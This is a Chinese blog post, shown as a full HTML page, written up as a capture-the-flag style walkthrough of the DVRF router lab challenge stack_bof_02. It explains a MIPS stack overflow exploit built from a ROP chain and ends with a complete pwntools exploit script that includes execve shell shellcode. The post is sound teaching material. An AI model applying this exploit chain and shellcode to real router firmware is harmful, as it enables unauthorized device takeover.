<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="本文对DVRF路由器漏洞靶机中的一道题目（stack_bof_02）进行了复现，详细记录了复现过程中如何利用gadget片段来构造ROP链进行攻击。">
<meta property="og:type" content="article">
<meta property="og:title" content="DVRF题目之MIPS栈溢出中ROP链的构造">
<meta property="og:url" content="http://example.com/2025/05/29/DVRF%E9%A2%98%E7%9B%AE%E4%B9%8BMIPS%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%ADROP%E9%93%BE%E7%9A%84%E6%9E%84%E9%80%A0/index.html">
<meta property="og:site_name" content="Qwen&#39;s blog">
<meta property="og:description" content="本文对DVRF路由器漏洞靶机中的一道题目（stack_bof_02）进行了复现，详细记录了复现过程中如何利用gadget片段来构造ROP链进行攻击。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501125.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291502808.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501092.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501240.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501760.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501155.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291502717.png">
<meta property="article:published_time" content="2025-05-29T06:59:47.000Z">
<meta property="article:modified_time" content="2025-05-29T07:26:06.172Z">
<meta property="article:author" content="Qwen">
<meta property="article:tag" content="IOT安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501125.png">

<link rel="canonical" href="http://example.com/2025/05/29/DVRF%E9%A2%98%E7%9B%AE%E4%B9%8BMIPS%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%ADROP%E9%93%BE%E7%9A%84%E6%9E%84%E9%80%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>DVRF题目之MIPS栈溢出中ROP链的构造 | Qwen's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Qwen's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
   <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/05/29/DVRF%E9%A2%98%E7%9B%AE%E4%B9%8BMIPS%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%ADROP%E9%93%BE%E7%9A%84%E6%9E%84%E9%80%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar_2.jpg">
      <meta itemprop="name" content="Qwen">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Qwen's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DVRF题目之MIPS栈溢出中ROP链的构造
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2025-05-29 14:59:47 / 修改时间：15:26:06" itemprop="dateCreated datePublished" datetime="2025-05-29T14:59:47+08:00">2025-05-29</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/IOT%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">IOT安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>本文对DVRF路由器漏洞靶机中的一道题目（<code>stack_bof_02</code>）进行了复现，详细记录了复现过程中如何利用<code>gadget</code>片段来构造<code>ROP</code>链进行攻击。</p>
<span id="more"></span>

<h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><p>直接看<code>main</code>函数：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501125.png" alt="image-20250529133717913" style="zoom:50%;" />

<p>漏洞点在第14行，<code>strcpy</code>函数会把命令行参数<code>argv[1]</code>复制到<code>v4</code>中，造成栈溢出且<code>argv[1]</code>可控。程序中并没有给出后门函数，只能执行<code>shellcode</code>来攻击。</p>
<h2 id="ROP构造"><a href="#ROP构造" class="headerlink" title="ROP构造"></a>ROP构造</h2><h3 id="调用sleep函数"><a href="#调用sleep函数" class="headerlink" title="调用sleep函数"></a>调用sleep函数</h3><p>通常将<code>shellcode</code>写到某个区域时，这块区域是作为数据缓存区来存放的，在执行<code>shellcode</code>的时候该区域又必须是指令缓存区，但是在<code>MIPS</code>架构中指令缓存区和数据缓存区的同步是需要一个时间的，也就是说在我们写入<code>shellcode</code>后不能立即将其执行，需要一个<code>sleep</code>来等待缓存区同步。</p>
<p>因为要先设置<code>$a0</code>为1作为<code>sleep</code>函数的参数，故可以找到如下<code>gadget1</code>：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291502808.png" alt="image-20250528003123823" style="zoom: 67%;" />

<p>可知这段代码最后会跳转到<code>$s1</code>中的地址，因此还需要一个gadget2，使在执行gadget1前可以控制<code>$s1</code>为下一个跳转地址。</p>
<p>利用<code>mipsrop.find(&quot;lw $s1,&quot;)</code>可以找到如下<code>gadget2</code>：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501092.png" alt="image-20250528005120082" style="zoom: 67%;" />

<p>先执行gadget2，设置<code>$ra</code>为gadget1的地址、设置<code>$s1</code>为目标地址，然后跳转执行gadget1，设置<code>$a0</code>为1，最后跳转到<code>$s1</code>中的地址。因为<code>jalr</code>指令在跳转前还会将<code>PC</code>加<code>8</code>作为返回地址存入<code>$ra</code>寄存器，这样我们在执行完<code>sleep</code>后就不能继续控制程序流了，所以不能将<code>$s1</code>设置为<code>sleep_addr</code>来通过<code>jalr</code>跳转。</p>
<p>还需要一个gadget3来，要求是可以通过<code>jr</code>跳转到<code>sleep</code>函数，并且可以控制<code>$ra</code>寄存器（执行完<code>sleep</code>会执行<code>jr $ra</code>返回）。</p>
<p>利用<code>mipsrop.tails()</code>可以找到如下<code>gadget3</code>：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501240.png" alt="image-20250528003524356" style="zoom:67%;" />

<p>现在先执行gadget2，设置<code>$ra</code>为gadget1的地址、<code>$s1</code>为gadget3的地址、<code>$s2</code>为<code>sleep_addr</code>；然后<code>jr $ra</code>跳转执行gadget1，设置<code>$a0</code>为1；然后<code>jalr $t9($s1)</code>跳转执行gadget3，设置<code>$ra</code>为目标地址（目前未知用<code>0xdeadbeef</code>替代）作为<code>sleep</code>函数的返回地址；然后<code>jr $t9(s2)</code>跳转执行<code>sleep</code>函数，执行完后便能返回到目标地址。</p>
<p>构造的payload如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">libc = <span class="number">0x7f6ea420</span>-<span class="number">0x17420</span></span><br><span class="line">sleep = libc+<span class="number">0x2f2b0</span></span><br><span class="line">gadget2 = libc+<span class="number">0x7730</span></span><br><span class="line"><span class="comment"># lw $ra,0x18+var_s10($sp)</span></span><br><span class="line"><span class="comment"># lw $s2,0x18+var_s8($sp)</span></span><br><span class="line"><span class="comment"># lw $s1,0x18+var_s4($sp)</span></span><br><span class="line"><span class="comment"># jr $ra</span></span><br><span class="line">gadget3 = libc+<span class="number">0x20f1c</span></span><br><span class="line"><span class="comment"># move $t9,$s2</span></span><br><span class="line"><span class="comment"># lw $ra,0x18+var_sC($sp)</span></span><br><span class="line"><span class="comment"># jr $t9</span></span><br><span class="line">gadget1 = libc+<span class="number">0x2fb10</span></span><br><span class="line"><span class="comment"># li $a0,1</span></span><br><span class="line"><span class="comment"># move $t9,$s1</span></span><br><span class="line"><span class="comment"># jalr $t9</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x1fc</span>+p32(gadget2)</span><br><span class="line">payload+= <span class="string">b&#x27;b&#x27;</span>*(<span class="number">0x28</span>-<span class="number">12</span>)+p32(gadget3)+p32(sleep)+<span class="string">b&#x27;sss3&#x27;</span>+p32(gadget1)</span><br><span class="line"><span class="comment">#                             $s1        $s2       $s3        $ra</span></span><br><span class="line">payload+= <span class="string">b&#x27;c&#x27;</span>*(<span class="number">0x2c</span>-<span class="number">16</span>)+<span class="string">b&#x27;sss0&#x27;</span>+<span class="string">b&#x27;sss1&#x27;</span>+<span class="string">b&#x27;sss2&#x27;</span>+p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line"><span class="comment">#                           $s0                        $ra</span></span><br></pre></td></tr></table></figure>

<h3 id="调用shellcode"><a href="#调用shellcode" class="headerlink" title="调用shellcode"></a>调用shellcode</h3><p>接下来就是要执行<code>shellcode</code>了，因为<code>shellcode</code>会被布置到栈上，所以我们需要一个可以把栈地址写到寄存器里的gadget4，利用<code>mipsrop.stackfinders()</code>进行搜索，可以找到如下<code>gadget4</code>：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501760.png" alt="image-20250529003539837" style="zoom:67%;" />

<p>在执行gadget3时将<code>$ra</code>设置为gadget4的地址，执行完<code>sleep</code>函数便能返回执行gadget4，gadget4会把<code>$sp+0x38+var_20</code>处的地址存储到<code>$a0</code>中，因此需要把<code>shellcode</code>写到<code>$sp+0x38+var_20</code>处，接着<code>jalr</code>跳转到<code>$s0</code>中的地址，因此在执行gadget3的时候还需要把<code>$s0</code>设置为下一个目标地址。</p>
<p>最后还需要一个gadget5用来跳转到<code>$a0</code>中的地址，直接<code>mipsrop.find(&quot;move $t9,$a0&quot;)</code>搜索即可：</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291501155.png" alt="image-20250529003933377" style="zoom:67%;" />

<p>这段gadget还会执行一个<code>sw</code>将<code>$v0</code>的值写到栈上<code>0x30+var_18($sp)</code>处，调试的过程中发现这里正好是存储<code>shellcode</code>的首地址，因此在布置<code>shellcode</code>时多填充一个内存单元即可。</p>
<p>编写<code>shellcode</code>时还需要注意由于溢出函数是<code>strcpy</code>函数会有<code>00</code>截断，所以<code>shellcode</code>的机器码中不能含有<code>\x00</code>。</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,endian=<span class="string">&#x27;little&#x27;</span>,word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">shellcode=asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">li $t0,0x6e69622f</span></span><br><span class="line"><span class="string">li $t1,0x68732f2f</span></span><br><span class="line"><span class="string">sw $t0,-0x10($sp)</span></span><br><span class="line"><span class="string">sw $t1,-0xc($sp)</span></span><br><span class="line"><span class="string">sw $a2,-0x8($sp)</span></span><br><span class="line"><span class="string">la $a0,-0x10($sp)</span></span><br><span class="line"><span class="string">slti $a1,$zero,-1</span></span><br><span class="line"><span class="string">slti $a2,$zero,-1</span></span><br><span class="line"><span class="string">addi $v0,$zero,4011</span></span><br><span class="line"><span class="string">syscall 0x10101</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line">libc = <span class="number">0x7f6ea420</span>-<span class="number">0x17420</span></span><br><span class="line">sleep = libc+<span class="number">0x2f2b0</span></span><br><span class="line">gadget2 = libc+<span class="number">0x7730</span></span><br><span class="line"><span class="comment"># lw $ra,0x18+var_s10($sp)</span></span><br><span class="line"><span class="comment"># lw $s2,0x18+var_s8($sp)</span></span><br><span class="line"><span class="comment"># lw $s1,0x18+var_s4($sp)</span></span><br><span class="line"><span class="comment"># jr $ra</span></span><br><span class="line">gadget3 = libc+<span class="number">0x20f1c</span></span><br><span class="line"><span class="comment"># move $t9,$s2addiu $sp,$sp,-0x10</span></span><br><span class="line"><span class="comment"># lw $ra,0x18+var_sC($sp)</span></span><br><span class="line"><span class="comment"># jr $t9</span></span><br><span class="line">gadget1 = libc+<span class="number">0x2fb10</span></span><br><span class="line"><span class="comment"># li $a0,1</span></span><br><span class="line"><span class="comment"># move $t9,$s1</span></span><br><span class="line"><span class="comment"># jalr $t9</span></span><br><span class="line">gadget4 = libc+<span class="number">0x16dd0</span></span><br><span class="line">gadget5 = libc+<span class="number">0x214a0</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x1fc</span>+p32(gadget2)</span><br><span class="line">payload+= <span class="string">b&#x27;b&#x27;</span>*(<span class="number">0x28</span>-<span class="number">12</span>)+p32(gadget3)+p32(sleep)+<span class="string">b&#x27;sss3&#x27;</span>+p32(gadget1)</span><br><span class="line"><span class="comment">#                             $s1        $s2       $s3        $ra</span></span><br><span class="line">payload+= <span class="string">b&#x27;c&#x27;</span>*(<span class="number">0x2c</span>-<span class="number">16</span>)+p32(gadget5)+<span class="string">b&#x27;sss1&#x27;</span>+<span class="string">b&#x27;sss2&#x27;</span>+p32(gadget4)</span><br><span class="line"><span class="comment">#                            $s0         $s1,$s2     $ra</span></span><br><span class="line">payload+= <span class="string">b&#x27;d&#x27;</span>*(<span class="number">0x18</span>+<span class="number">4</span>)+shellcode</span><br><span class="line"><span class="comment"># p = process([&quot;qemu-mipsel&quot;,&quot;./stack_bof_02&quot;,payload])</span></span><br><span class="line">p = process([<span class="string">&quot;qemu-mipsel&quot;</span>,<span class="string">&quot;-g&quot;</span>,<span class="string">&quot;1234&quot;</span>,<span class="string">&quot;./stack_bof_02&quot;</span>,payload])</span><br><span class="line">p.interactive()</span><br><span class="line"><span class="comment">#0x0040091C</span></span><br></pre></td></tr></table></figure>

<p>攻击效果如下：</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202505291502717.png" alt="QQ_1748496852704"></p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/172126#h2-0">路由器漏洞挖掘之栈溢出入门（三）ROP链的构造</a></p>
<p><a target="_blank" rel="noopener" href="https://www.mrskye.cn/archives/6f13cd09/#EXP-1">DVRF 路由器漏洞靶机题目笔记</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/hetianlab/p/18840600">MIPS栈溢出漏洞实战解析：从DVRF题目看ROP链构造</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/IOT%E5%AE%89%E5%85%A8/" rel="tag"># IOT安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/05/21/CVE-2018-7034%E5%A4%8D%E7%8E%B0-D-Link%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87/" rel="prev" title="CVE-2018-7034复现_D-Link信息泄露(权限绕过)">
      <i class="fa fa-chevron-left"></i> CVE-2018-7034复现_D-Link信息泄露(权限绕过)
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
      <!-- require APlayer -->
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css">
      <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
      <!-- require MetingJS-->
      <script src="https://cdn.jsdelivr.net/npm/meting@2.0.1/dist/Meting.min.js"></script>
      <meting-js
        auto="https://y.qq.com/n/yqq/playlist/9454682797.html#stat=y_new.playlist.pic_click">
      </meting-js>

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="nav-number">1.</span> <span class="nav-text">逆向分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ROP%E6%9E%84%E9%80%A0"><span class="nav-number">2.</span> <span class="nav-text">ROP构造</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B0%83%E7%94%A8sleep%E5%87%BD%E6%95%B0"><span class="nav-number">2.1.</span> <span class="nav-text">调用sleep函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B0%83%E7%94%A8shellcode"><span class="nav-number">2.2.</span> <span class="nav-text">调用shellcode</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">3.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="nav-number">4.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Qwen"
      src="/images/avatar_2.jpg">
  <p class="site-author-name" itemprop="name">Qwen</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">59</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Qwen</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">280k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:14</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>




    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
